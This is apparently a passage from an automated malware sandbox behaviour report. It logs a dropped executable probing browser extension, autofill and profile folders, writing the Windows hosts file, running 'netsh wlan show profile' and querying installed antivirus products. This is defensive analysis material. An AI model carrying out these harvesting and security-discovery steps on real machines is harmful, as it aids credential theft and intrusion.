                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\eu VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fa VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fi VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.8 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ms VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ne VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pt_BR VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sl VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2023.8.1 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sr VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sv VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486 VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ta VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\te VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0027CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_0027CBEA
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_006D2517 GetTimeZoneInformation,3_2_006D2517
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                Lowering of HIPS / PFW / Operating System Security Settings

                                barindex
                                Modifies the hosts file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Uses netsh to modify the Windows network and firewall settings
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                Source: 8ZVMneG.exe, 00000054.00000003.2967071098.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2967071098.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, 8ZVMneG.exe, 00000054.00000003.2967539041.00000000012EC000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005F.00000003.3030418791.00000000012D9000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005F.00000003.2960034570.0000000001338000.00000004.00000020.00020000.00000000.sdmp, d0ef52de9f.exe, 0000005F.00000003.2960705475.000000000132A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                                Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct
                                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct
